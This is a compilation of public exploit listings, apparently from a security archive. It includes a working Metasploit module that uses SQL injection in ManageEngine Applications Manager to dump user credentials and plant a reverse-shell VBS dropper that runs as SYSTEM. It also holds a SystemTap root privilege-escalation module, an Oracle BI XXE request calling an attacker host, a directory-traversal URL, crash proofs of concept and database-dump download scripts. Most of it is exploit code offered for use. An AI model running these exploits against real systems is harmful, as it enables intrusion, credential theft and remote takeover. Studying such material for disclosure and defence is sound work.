
ManageEngine Applications Manager 14 SQL Injection / Remote Code Execution


This Metasploit module exploits SQL injection and command injection vulnerabilities in ManageEngine Applications Manager 14 and earlier. An unauthenticated attacker can obtain SYSTEM privileges on the server through the SQL injection: the PostgreSQL `COPY ... TO` statement is abused to write an arbitrary file, and the module uses it to overwrite a ".vbs" monitoring script that ManageEngine itself executes as SYSTEM with the payload (the original script is not restored). It also dumps the username and password columns of the user table. Note that once the malicious ".vbs" file has been written, the shell session may take a while to arrive, because the application has to run the file on its own schedule.


MD5 | e4067a38b1263e4f06fdc9547f9866c7

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

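class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  # Install directory name under C:\Program Files (x86)\ManageEngine\ for
  # each supported target (the target name with the space removed).
  TARGET_DIRS = {
    'AppManager 14' => 'AppManager14',
    'AppManager 13' => 'AppManager13',
    'AppManager 12' => 'AppManager12',
    'AppManager 11' => 'AppManager11'
  }.freeze

  def initialize(info = {})
    super(update_info(info,
      'Name' => "ManageEngine Applications Manager 11.0 < 14.0 SQL Injection / Remote Code Execution",
      'Description' => %q(
This module exploits sql and command injection vulnerability in the ManageEngine AM 14 and prior versions.
An unauthenticated user can gain the authority of "system" on the server due to SQL injection vulnerability.
Exploit allows the writing of the desired file to the system using the postgesql structure.
Module is written over the payload by selecting a file with the extension ".vbs" that is used for monitoring
by the ManageEngine which working with "system" authority.

In addition, it dumps the users and passwords from the database for us.
Keep in mind! After the harmful ".vbs" file is written, the shell session may be a bit late.
Because the ManageEngine application should run this file itself.
),
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
        ],
      'References' =>
        [
          ['URL', 'https://pentest.com.tr/exploits/ManageEngine-App-Manager-14-SQLi-Remote-Code-Execution.html']
        ],
      'DefaultOptions' =>
        {
          'WfsDelay' => 500,
          'PAYLOAD' => 'windows/shell_reverse_tcp',
          'RPORT' => 8443,
          'SSL' => true
        },
      'Payload' =>
        {
          'Encoder' => 'x86/shikata_ga_nai'
        },
      'Platform' => ['win'],
      'Arch' => [ARCH_X86, ARCH_X64],
      'Targets' =>
        [
          ['AppManager 14', {}],
          ['AppManager 13', {}],
          ['AppManager 12', {}],
          ['AppManager 11', {}]
        ],
      'Privileged' => true,
      'DisclosureDate' => 'Apr 17 2019',
      'DefaultTarget' => 1))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the application', '/'])
      ]
    )
  end

  ##
  # Probe the injection point with a harmless one-character value.
  #
  # Returns CheckCode::Appears when the endpoint answers and sets a
  # JSESSIONID cookie. That only shows the vulnerable JSP is reachable, not
  # that a stacked query was executed, hence "Appears" rather than
  # "Vulnerable". Returns CheckCode::Unknown when no response came back
  # (send_request_cgi yields nil on timeout; the original crashed here).
  ##
  def check
    res = inject(Rex::Text.rand_text_alpha(1))
    return Exploit::CheckCode::Unknown if res.nil?

    injected?(res) ? Exploit::CheckCode::Appears : Exploit::CheckCode::Safe
  end

  ##
  # Build the payload, dump the user table, and write the VBS dropper over
  # ManageEngine's wmiget.vbs via the SQL injection. Returns the raw
  # payload executable (the caller ignores it; kept for compatibility).
  #
  # Operational notes for the operator:
  #  * wmiget.vbs is overwritten in place and never restored by this module.
  #  * The credential dump is written to a randomly named .txt in the web
  #    root and is not removed afterwards.
  #  * The dropper extracts the EXE under a fixed name (SAEeVSXQVkDEIG.exe),
  #    which is a static indicator.
  ##
  def get_payload
    handler # kept from the original module: started before the write
    exe = generate_payload_exe
    @vbs_content = Msf::Util::EXE.to_exe_vbs(exe)

    tfile = TARGET_DIRS.fetch(target.name)

    dump_credentials(tfile)
    write_vbs(tfile, vbs_stub(extract_b64))

    exe
  end

  ##
  # Call functions
  ##
  def exploit
    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end
    print_status("Payload is preparing...")
    get_payload
  end

  ##
  # POST the injected `sid` value to Popup_SLA.jsp. The body is sent as-is
  # with a form content type, so the `+` characters in the SQL become
  # spaces server-side. Returns the Rex response, or nil on timeout.
  ##
  def inject(payload)
    send_request_cgi({
      'method' => 'POST',
      'ctype' => 'application/x-www-form-urlencoded',
      'uri' => normalize_uri(target_uri.path, '/jsp/Popup_SLA.jsp'),
      'data' => payload
    }, 25)
  end

  private

  ##
  # True when the injection endpoint answered and set a JSESSIONID cookie.
  #
  # The original wrote `res.code = "200" && ...` (assignment, not comparison),
  # so the HTTP status was never actually enforced and the cookie was the only
  # signal. That effective behaviour is kept; only the nil guard is added.
  ##
  def injected?(res)
    return false if res.nil?

    res.headers['set-cookie'].to_s.include?('JSESSIONID')
  end

  ##
  # Use COPY ... TO to write username/password from AM_UserPasswordTable
  # into a random .txt under working\ (served by the web server), then fetch
  # and print it.
  #
  # A failed read is reported but is not fatal: the credential dump is a
  # bonus, and the original's `res.code == "404"` (String vs Integer) never
  # matched, so in practice it never aborted here either.
  ##
  def dump_credentials(tfile)
    fhashes = Rex::Text.rand_text_alpha_lower(8) + ".txt"
    hashes = "sid=1;copy+(select+username,password+from+AM_UserPasswordTable)+to+$$"
    hashes << "c:\\Program+Files+(x86)\\ManageEngine\\"
    hashes << tfile
    hashes << "\\working\\"
    hashes << fhashes
    hashes << "$$;--"

    res = inject(hashes)
    fail_with(Failure::Unreachable, 'Connection error occurred!') unless injected?(res)
    print_good("Users in the database were taken...")

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, fhashes) # users file url
    })

    if res.nil? || res.code != 200
      print_error('The database could not be read!')
      return
    end

    print_status("--------------------Usernames and Passwords---------------------")
    print_line(res.body) # users table output
    print_status("----------------------------------------------------------------")
    print_warning("#{fhashes} with the dumped credentials is left in the web root; remove it when done.")
  end

  ##
  # Pull the base64 blob out of the framework-generated VBS dropper: the
  # text before the first `"\nDim`, split on ` = "`, third element. This
  # matches the layout produced by Msf::Util::EXE.to_exe_vbs at the time
  # the module was written; it is not validated here.
  ##
  def extract_b64
    @vbs_content.split("\"\nDim")[0].split(' = "')[2]
  end

  ##
  # Base64-encode the one-line VBS and write it over
  # working\conf\application\scripts\wmiget.vbs via COPY ... TO. The script
  # is then executed by ManageEngine's own monitoring, which is why the
  # session can take a while to arrive.
  ##
  def write_vbs(tfile, vbs_file)
    # encode the vbs file to base64 and then url-hex encode every byte
    encoding_vbs = Rex::Text.uri_encode(Rex::Text.encode_base64(vbs_file), 'hex-all')

    vbs_payload = "sid=1;copy+(select+convert_from(decode($$#{encoding_vbs}$$,$$base64$$)"
    vbs_payload << ",$$utf-8$$))+to+$$C:\\\\Program+Files+(x86)\\\\ManageEngine\\\\"
    vbs_payload << tfile
    vbs_payload << "\\\\working\\\\conf\\\\application\\\\scripts\\\\wmiget.vbs$$;"

    res = inject(vbs_payload)
    fail_with(Failure::Unreachable, 'Connection error occurred!') unless injected?(res)

    print_good("The harmful .vbs file was successfully written to the server.")
    print_status("Keep in mind! You may have to wait between 10-300 seconds for the shell session.")
  end

  ##
  # One-line VBS: a WMI query wrapper (keeping the look of the original
  # wmiget.vbs) followed by a function that base64-decodes `pb64` to a temp
  # EXE, runs it and deletes it. The text is reproduced verbatim from the
  # original module.
  ##
  def vbs_stub(pb64)
    vbs_file = 'On Error Resume Next:Set objWbemLocator = CreateObject("WbemScripting.SWbemLocator"):'
    vbs_file << 'if Err.Number Then:WScript.Echo vbCrLf & "Error # "& ""& Err.Description:End If:O'
    vbs_file << 'n Error GoTo 0:On Error Resume Next:Select Case WScript.Arguments.Count:Case 2:strCo'
    vbs_file << 'mputer = Wscript.Arguments(0):strQuery = Wscript.Arguments(1):Set wbemServices = obj'
    vbs_file << 'WbemLocator.ConnectServer (strComputer,"Root\\CIMV2"):Case 4:strComputer = Wscript.A'
    vbs_file << 'rguments(0):strUsername = Wscript.Arguments(1):strPassword = Wscript.Arguments(2):st'
    vbs_file << 'rQuery = Wscript.Arguments(3):Set wbemServices = objWbemLocator.ConnectServer (strCo'
    vbs_file << 'mputer,"Root\\CIMV2",strUsername,strPassword):case 6:strComputer = Wscript.Arguments'
    vbs_file << '(0):strUsername = Wscript.Arguments(1):strPassword = Wscript.Arguments(2):strQuery ='
    vbs_file << ' Wscript.Arguments(4):namespace = Wscript.Arguments(5):Set wbemServices = objWbemLoca'
    vbs_file << 'tor.ConnectServer (strComputer,namespace,strUsername,strPassword):Case Else:strMsg ='
    vbs_file << '"Error # in parameters passed":WScript.Echo strMsg:WScript.Quit(0):End Select:Set w'
    vbs_file << 'bemServices = objWbemLocator.ConnectServer (strComputer, namespace, strUsername, str'
    vbs_file << 'Password):if Err.Number Then:WScript.Echo vbCrLf & "Error # "& ""& Err.Descriptio'
    vbs_file << 'n:End If:On Error GoTo 0:On Error Resume Next:Set colItems = wbemServices.ExecQuery(s'
    vbs_file << 'trQuery):if Err.Number Then:WScript.Echo vbCrLf & "Error # "& ""& Err.Description'
    vbs_file << ':End If:On Error GoTo 0:i=0:For Each objItem in colItems:if i=0 then:header = "":For '
    vbs_file << 'Each param in objItem.Properties_:header = header & param.Name & vbTab:Next:WScript.E'
    vbs_file << 'cho header:i=1:end if:serviceData = "":For Each param in objItem.Properties_:serviceD'
    vbs_file << 'ata = serviceData & param.Value & vbTab:Next:WScript.Echo serviceData:Next:Function b'
    vbs_file << 'PBdVfYpfCEHF(hBPVZMitxq):HHgwqsqii = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-m'
    vbs_file << 'icrosoft-com:datatypes"& Chr(34) & ""& "dt:dt="& Chr(34) & "bin.base64"& Chr(34)'
    vbs_file << '& ">"& hBPVZMitxq & "</B64DECODE>":Set TInPBSeVlL = CreateObject("MSXML2.DOMDocument'
    vbs_file << '.3.0"):TInPBSeVlL.LoadXML(HHgwqsqii):bPBdVfYpfCEHF = TInPBSeVlL.selectsinglenode("B64D'
    vbs_file << 'ECODE").nodeTypedValue:set TInPBSeVlL = nothing:End Function:Function txhYXYJJl():Emkf'
    vbs_file << 'dMDdusgGha = "'
    vbs_file << pb64.to_s
    vbs_file << '":Dim CCEUdwNSS:Set CCEUdwNSS = CreateObject("Scripting.FileSystemObject"):Dim zhgqIZn'
    vbs_file << 'K:Dim gnnTqZvAcL:Set zhgqIZnK = CCEUdwNSS.GetSpecialFolder(2):gnnTqZvAcL = zhgqIZnK & '
    vbs_file << '"\"& CCEUdwNSS.GetTempName():CCEUdwNSS.CreateFolder(gnnTqZvAcL):yZUoLXnPic = gnnTqZvAc'
    vbs_file << 'L & "\"& "SAEeVSXQVkDEIG.exe":Dim mEciydMZTsoBmAo:Set mEciydMZTsoBmAo = CreateObject("'
    vbs_file << 'Wscript.Shell"):LXbjZKnEQUfaS = bPBdVfYpfCEHF(EmkfdMDdusgGha):Set TUCiiidRgJQdxTl = Cre'
    vbs_file << 'ateObject("ADODB.Stream"):TUCiiidRgJQdxTl.Type = 1:TUCiiidRgJQdxTl.Open:TUCiiidRgJQdxT'
    vbs_file << 'l.Write LXbjZKnEQUfaS:TUCiiidRgJQdxTl.SaveToFile yZUoLXnPic, 2:mEciydMZTsoBmAo.run yZU'
    vbs_file << 'oLXnPic, 0, true:CCEUdwNSS.DeleteFile(yZUoLXnPic):CCEUdwNSS.DeleteFolder(gnnTqZvAcL):E'
    vbs_file << 'nd Function:txhYXYJJl:WScript.Quit(0)'
    vbs_file
  end
end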
##
# The end of the adventure (o_O) // AkkuS
##


Netwide Assembler (NASM) 2.14rc15 Null Pointer Dereference


Netwide Assembler (NASM) version 2.14rc15 null pointer dereference proof of concept exploit.


MD5 | c9178a3a96fda40a13f7581eef7e69fc

# Exploit Title: Netwide Assembler (NASM) 2.14rc15 NULL Pointer Dereference (PoC)
# Date: 2018-09-05
# Exploit Author: Fakhri Zulkifli
# Vendor Homepage: https://www.nasm.us/
# Software Link: https://www.nasm.us/pub/nasm/releasebuilds/?C=M;O=D
# Version: 2.14rc15 and earlier
# Tested on: 2.14rc15
# CVE : CVE-2018-16517

asm/labels.c in Netwide Assembler (NASM) is prone to NULL Pointer Dereference, which allows the attacker to cause a denial of service via a crafted file.

PoC:
1. echo "equ push rax"> poc
2. nasm -f elf poc

For an input line such as `equ push rax`, insn_is_label stays false, so the branch below is not taken and result->label is left NULL; that NULL pointer is later passed to islocal(), which dereferences it unconditionally.

[...]

if (i == TOKEN_ID || (insn_is_label && i == TOKEN_INSN)) { <-- not taken
/* there's a label here */
first = false;
result->label = tokval.t_charptr;
i = stdscan(NULL, &tokval);
if (i == ':') { /* skip over the optional colon */
i = stdscan(NULL, &tokval);
} else if (i == 0) {
nasm_error(ERR_WARNING | ERR_WARN_OL | ERR_PASS1,
"label alone on a line without a colon might be in error");
}
if (i != TOKEN_INSN || tokval.t_integer != I_EQU) {
/*
* FIXME: location.segment could be NO_SEG, in which case
* it is possible we should be passing 'absolute.segment'. Look into this.
* Work out whether that is *really* what we should be doing.
* Generally fix things. I think this is right as it is, but
* am still not certain.
*/
define_label(result->label,
in_absolute ? absolute.segment : location.segment,
location.offset, true);
[...]

/* Returns true when `l` names a local label: "@@"-prefixed in TASM mode,
 * otherwise a single leading '.'. `l` is indexed without a NULL check, so
 * callers must never pass NULL -- in the PoC above result->label is still
 * NULL because the "equ push rax" line never assigned it. */
static bool islocal(const char *l)
{
if (tasm_compatible_mode) {
if (l[0] == '@'&& l[1] == '@')
return true;
}
return (l[0] == '.'&& l[1] != '.'); <-- boom
}

SystemTap 1.3 MODPROBE_OPTIONS Privilege Escalation


This Metasploit module attempts to gain root privileges by exploiting a vulnerability in the staprun executable included with SystemTap version 1.3. The staprun executable does not clear environment variables prior to executing modprobe, allowing an arbitrary configuration file to be specified in the MODPROBE_OPTIONS environment variable, resulting in arbitrary command execution with root privileges. This module has been tested successfully on: systemtap 1.2-1.fc13-i686 on Fedora 13 (i686); and systemtap 1.1-3.el5 on RHEL 5.5 (x64).


MD5 | b8d10e29a77409ce1871a790dad33d49

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'SystemTap MODPROBE_OPTIONS Privilege Escalation',
      'Description' => %q{
This module attempts to gain root privileges by exploiting a
vulnerability in the `staprun` executable included with SystemTap
version 1.3.

The `staprun` executable does not clear environment variables prior to
executing `modprobe`, allowing an arbitrary configuration file to be
specified in the `MODPROBE_OPTIONS` environment variable, resulting
in arbitrary command execution with root privileges.

This module has been tested successfully on:

systemtap 1.2-1.fc13-i686 on Fedora 13 (i686); and
systemtap 1.1-3.el5 on RHEL 5.5 (x64).
},
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Tavis Ormandy', # Discovery and exploit
          'bcoles' # Metasploit
        ],
      'DisclosureDate' => '2010-11-17',
      'References' =>
        [
          ['BID', '44914'],
          ['CVE', '2010-4170'],
          ['EDB', '15620'],
          ['URL', 'https://securitytracker.com/id?1024754'],
          ['URL', 'https://access.redhat.com/security/cve/cve-2010-4170'],
          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=653604'],
          ['URL', 'https://lists.fedoraproject.org/pipermail/package-announce/2010-November/051115.html'],
          ['URL', 'https://bugs.launchpad.net/bugs/677226'],
          ['URL', 'https://www.debian.org/security/2011/dsa-2348']
        ],
      'Platform' => ['linux'],
      'Arch' =>
        [
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
      'SessionTypes' => ['shell', 'meterpreter'],
      'Targets' => [['Auto', {}]],
      'DefaultTarget' => 0))

    register_options([
      OptString.new('STAPRUN_PATH', [true, 'Path to staprun executable', '/usr/bin/staprun'])
    ])
    register_advanced_options([
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ])
  end

  # Path of the setuid staprun binary (STAPRUN_PATH option).
  def staprun_path
    datastore['STAPRUN_PATH']
  end

  # Directory that receives the dropped payload and the modprobe config.
  # NOTE(review): not checked for a noexec mount; if WritableDir is mounted
  # noexec the dropped ELF will not run.
  def base_dir
    datastore['WritableDir'].to_s
  end

  # Drop `data` at `path`, replacing any existing file, and register it so
  # FileDropper removes it when the session is cleaned up.
  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  # Same as upload, then mark the file executable.
  def upload_and_chmodx(path, data)
    upload path, data
    chmod path
  end

  # Detected when staprun is both executable by this session and setuid.
  # Only presence is tested; the SystemTap version is not inspected.
  def check
    # On some systems, staprun execution is restricted to stapusr group:
    # ---s--x---. 1 root stapusr 178488 Mar 28 2014 /usr/bin/staprun
    executable = cmd_exec("test -x '#{staprun_path}'&& echo true").include?('true')
    if executable
      vprint_good "#{staprun_path} is executable"
    else
      vprint_error "#{staprun_path} is not executable"
      return CheckCode::Safe
    end

    if setuid?(staprun_path)
      vprint_good "#{staprun_path} is setuid"
      CheckCode::Detected
    else
      vprint_error "#{staprun_path} is not setuid"
      CheckCode::Safe
    end
  end

  # Drops the payload and a modprobe config whose `install` line runs
  # /bin/sh, then invokes staprun with MODPROBE_OPTIONS pointing at that
  # config so the root-owned modprobe executes the payload path read from
  # stdin (backgrounded with `&`).
  def exploit
    force = datastore['ForceExploit']

    if check != CheckCode::Detected
      fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' unless force
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root? && !force
      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
    end

    fail_with Failure::BadConfig, "#{base_dir} is not writable" unless writable?(base_dir)

    payload_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"
    config_path = "#{payload_path}.conf"

    upload_and_chmodx payload_path, generate_payload_exe
    upload config_path, "install uprobes /bin/sh"

    print_status 'Executing payload...'
    command = "echo '#{payload_path}&' | MODPROBE_OPTIONS='-C #{config_path}' #{staprun_path} -u #{rand_text_alphanumeric 10..15}"
    vprint_line cmd_exec(command)
  end
end

QNAP myQNAPcloud Connect 1.3.4.0317 Username/Password Denial Of Service


QNAP myQNAPcloud Connect version 1.3.4.0317 suffers from a username / password denial of service vulnerability.


MD5 | eef736e1170e46864d7d0a6fc2d89c8c

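#!/usr/bin/python
# Exploit Title: QNAP myQNAPcloud Connect "Username/Password" DOS
# Date: 19/04/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.qnap.com
# Version: 1.3.4.0317 and below are vulnerable
# Software Link: https://www.qnap.com/en/utilities/essentials
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP/7/10 (version 1.3.3.0925)
# CVE: CVE-2019-7181
# POC
# 1.) Generate qnap.txt
# 2.) Copy the contents of qnap.txt to the clipboard
# 3.) Paste the contents in any username/password field(Add or Edit VPN)
# 4.) Click ok, program crashes.
# This vulnerability was responsibly disclosed February 3, 2019; a fixed version has been released.
#
# Note: this PoC only demonstrates a crash (denial of service); nothing here
# shows control of execution.

PAYLOAD_LENGTH = 1000
OUTPUT_FILE = "qnap.txt"


def build_payload(length=PAYLOAD_LENGTH):
    """Return the crash string: `length` ASCII 'A' characters."""
    return "A" * length


def write_poc(path=OUTPUT_FILE, length=PAYLOAD_LENGTH):
    """Write the PoC string to `path`.

    Returns True on success, False if the file could not be created. The
    `with` block closes the file even when the write fails (the original
    leaked the handle on error and swallowed every exception).
    """
    payload = build_payload(length)
    try:
        with open(path, "w") as f:
            print("[+] Creating %s bytes QNAP payload.." % len(payload))
            f.write(payload)
    except (IOError, OSError) as e:
        print("File cannot be created (%s)" % e)
        return False
    print("[+] File created!")
    return True


if __name__ == "__main__":
    write_poc()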


Oracle Business Intelligence And XML Publisher XML Injection


Oracle Business Intelligence and XML Publisher versions 11.1.1.9.0, 12.2.1.3.0, and 12.2.1.4.0 suffer from an XML external entity injection vulnerability.


MD5 | bc009d1748496f3eab0aaea024fbd529

# Exploit Title: XXE in Oracle Business Intelligence and XML Publisher
# Date: 16.04.19
# Exploit Author: @vah_13
# Vendor Homepage: http://oracle.com
# Software Link:
https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html
# Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0
# Tested on: Windows
# CVE : CVE-2019-2616 (7.2/10)

PoC:

POST /xmlpserver/ReportTemplateService.xls HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101
Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Length: 76
Content-Type: text/xml; charset=UTF-8

<!DOCTYPE soap:envelope PUBLIC "-//B/A/EN" "http://IP/123">

(The PUBLIC identifier's system URL points at an attacker-controlled host; the parser fetching it is the out-of-band confirmation. The `<http://ehost/123>` fragment in the original listing is a mail-client link artifact, not part of the request.)

Oracle Business Intelligence Directory Traversal


Oracle Business Intelligence versions 11.1.1.9.0, 12.2.1.3.0, and 12.2.1.4.0 suffer from a directory traversal vulnerability.


MD5 | 9609e14be7ddc622ccd6ff1ad192dbe1

# Exploit Title: Directory traversal in Oracle Business Intelligence
# Date: 16.04.19
# Exploit Author: @vah_13
# Vendor Homepage: http://oracle.com
# Software Link:
https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html
# Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0
# Tested on: Windows
# CVE : CVE-2019-2588

PoC

http://server:9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini

ChurchCRM Software 3.3.2 Database Disclosure


ChurchCRM Software version 3.3.2 suffers from a database disclosure vulnerability: the demo SQL dump shipped in the project repository is reachable under the web root. On an unmodified install the file contains only the publicly available demo data; it is sensitive where an operator has replaced it with a real backup.


MD5 | 6cd0e04c8db480f4d450eb376dc086f1

###########################################################################

# Exploit Title : ChurchCRM Software 3.3.2 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/04/2019
# Vendor Homepage : churchcrm.io
# Software Download Link :
github.com/ChurchCRM/CRM/releases/download/3.3.2/ChurchCRM-3.3.2.zip
# Software Information Link : churchcrm.io/features/
# Software Version : 3.3.2 and other lower versions
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type :
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Acunetix Reference Link About => [ phpMyAdmin SQL Dump File ]
acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
# Acunetix Reference Link About : [ Possible Database Backup File ]
acunetix.com/vulnerabilities/web/possible-database-backup/

###########################################################################

# Information about Software :
****************************
ChurchCRM is an OpenSource Church CRM & Management Software.

###########################################################################

# Impact :
***********
* The product stores sensitive information in files or directories that are accessible

to actors outside of the intended control sphere.

* An information exposure is the intentional or unintentional disclosure of information

to an actor that is not explicitly authorized to have access to that information.

* phpMyAdmin is a free software tool written in PHP, intended to handle the administration of

MySQL over the World Wide Web. It can be used to dump a database or a collection of

databases for backup or transfer to another SQL server (not necessarily a MySQL server).

The dump typically contains SQL statements to create the table, populate it, or both.

This file contains an phpMyAdmin SQL dump. This information is highly sensitive and

should not be found on a production system.

* It looks like this file contains a database backup/dump.

Acunetix inferred this filename from the domain name. A database backup contains a record of the

table structure and/or the data from a database and is usually in the form of a list of SQL statements.

A database backup is most often used for backing up a database so that its contents can be restored

in the event of data loss. This information is highly sensitive and should never be found on a production system.

Remediation : Sensitive files such as database backups should never be stored in a directory that is accessible

to the web server. As a workaround, you could restrict access to this file.

###########################################################################

File :
******
/demo/ChurchCRM-Database.sql

/ChurchCRM-Database.sql

Information :
*************
-- mysqldump-php github.com/ifsnop/mysqldump-php
--
-- Host: localhost Database: churchcrm
-- ------------------------------------------------------
-- Server version 5.7.21-0ubuntu0.16.04.1
-- Date: Mon, 09 Apr 2018 12:04:25 -0400

-- Table structure for table `config_cfg`

-- Dumping data for table `config_cfg`

-- Table structure for table `person_per`

-- Dumping data for table `person_per`

-- Table structure for table `user_usr`

-- Dumping data for table `user_usr`

-- Table structure for table `userconfig_ucfg`

-- Dumping data for table `userconfig_ucfg`

raw.githubusercontent.com/ChurchCRM/CRM/master/demo/ChurchCRM-Database.sql

###########################################################################

# Database Disclosure Information Exposure Exploit 1 :
***********************************************
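#!/usr/bin/python
# ChurchCRM 3.3.2 - fetch the publicly reachable demo database dump.
# Run it and enter the site's base URL (e.g. http://host/churchcrm).
import re
import sys

try:  # Python 2
    from urllib2 import Request, urlopen, HTTPError, URLError
    read_line = raw_input
except ImportError:  # Python 3
    from urllib.request import Request, urlopen
    from urllib.error import HTTPError, URLError
    read_line = input

DISC = "/demo/ChurchCRM-Database.sql"


def build_url(base_url, disc=DISC):
    """Join the user-supplied base URL and the dump path without a double slash."""
    return base_url.rstrip("/") + disc


def fetch_dump(base_url, disc=DISC):
    """GET the dump and return its body as text, or None on failure.

    HTTP errors and connection failures are reported instead of raising
    (the original let urlopen's exception abort the script).
    """
    url = build_url(base_url, disc)
    try:
        resp = urlopen(Request(url))
    except HTTPError as e:
        print("[-] HTTP %s for %s" % (e.code, url))
        return None
    except URLError as e:
        print("[-] Request failed: %s" % e.reason)
        return None
    body = resp.read()
    if not isinstance(body, str):  # Python 3 returns bytes
        body = body.decode("utf-8", "replace")
    return body


def looks_like_dump(html):
    """True when the body carries a MySQL dump header (the advisory's sample
    starts with '-- mysqldump-php'); a 200 with an HTML page is a soft 404."""
    return re.search(r"mysql ?dump", html, re.I) is not None


def find_matches(html):
    """Return the 'resources...' fragments the original script grepped for.

    The pattern is kept from the original PoC; the trailing '=*' is redundant
    because '.*' already consumes the rest of the line.
    """
    return re.findall("resources.*=*", html)


def main():
    html = fetch_dump(read_line("URL: "))
    if html is None:
        sys.exit(1)
    if not looks_like_dump(html):
        print("[!] Response does not look like a SQL dump")
    print("Result")
    print(str(find_matches(html)))


if __name__ == "__main__":
    main()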

###########################################################################

# Database Disclosure Information Exposure Exploit 2 :
***********************************************
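#!/usr/bin/perl -w
# Author : KingSkrupellos
# Team : Cyberizm Digital Security Army
#
# Downloads ChurchCRM's publicly reachable demo database dump.
#
#   perl $0 site.com /path/ [output-file]
#
# Changes from the original PoC: the banner is printed instead of being
# passed to system() (which tried to execute it as a command), the
# Windows-only `cls`/`color` calls are dropped, the unused LWP::Simple is
# gone, and the dump is saved to a file named on the command line (default:
# ChurchCRM-Database.sql in the current directory) rather than to a
# hard-coded D:/demo/ path that the original silently overwrote $File with.
use strict;
use LWP::UserAgent;

my $FILE = "demo/ChurchCRM-Database.sql";

sub help {
    print "[+] usage1 : perl $0 site.com /path/ \n";
    print "[+] usage2 : perl $0 localhost / \n";
}

print "ChurchCRM Software 3.3.2 Database Disclosure Exploit\n";

if (@ARGV < 2) {
    print "[-]How To Use\n\n";
    help();
    exit();
}

my ($target, $path, $out) = @ARGV;
$out = "ChurchCRM-Database.sql" unless defined $out;

my $url = "http://" . $target . $path . $FILE;
print "\n Wait Please Dear Hacker!!! \n\n";

my $ua = LWP::UserAgent->new();
my $response = $ua->get($url, ":content_file" => $out);

if ($response->is_success) {
    # A 200 with an HTML body is most likely a soft-404 or login page, not the dump.
    if (($response->content_type || '') =~ /html/i) {
        print "[!] $url returned HTML, not a SQL dump; inspect $out before trusting it\n";
    }
    print "[+] $url Exploited!\n\n";
    print "[+] Database saved to $out\n";
    exit();
}
else {
    print "[!] Exploiting $url Failed !\n[!] " . $response->status_line . "\n";
    exit();
}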

###########################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###########################################################################

OpenDocMan Document Management System 1.3.5 Database Disclosure


OpenDocMan Document Management System version 1.3.5 suffers from a database disclosure vulnerability: the schema/seed SQL file shipped in the project repository is reachable under the web root. On an unmodified install it contains only the publicly available schema and seed rows; it is sensitive where an operator has replaced it with a real backup.


MD5 | 5d1cb17bff6714f29f2366a87b1fad4d

###########################################################################

# Exploit Title : OpenDocMan Document Management System 1.3.5 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/04/2019
# Vendor Homepage : opendocman.com
# Software Download Link : opendocman.com/free-download/
github.com/opendocman/opendocman/archive/master.zip
sourceforge.net/projects/opendocman/files/opendocman/1.3.5/opendocman-1.3.5.zip/download
# Software Information Link : opendocman.com/features/
# Software Version : 1.3.5 and All Other Lower Versions
opendocman.com/category/changelog/
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type :
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Acunetix Reference Link About => [ phpMyAdmin SQL Dump File ]
acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
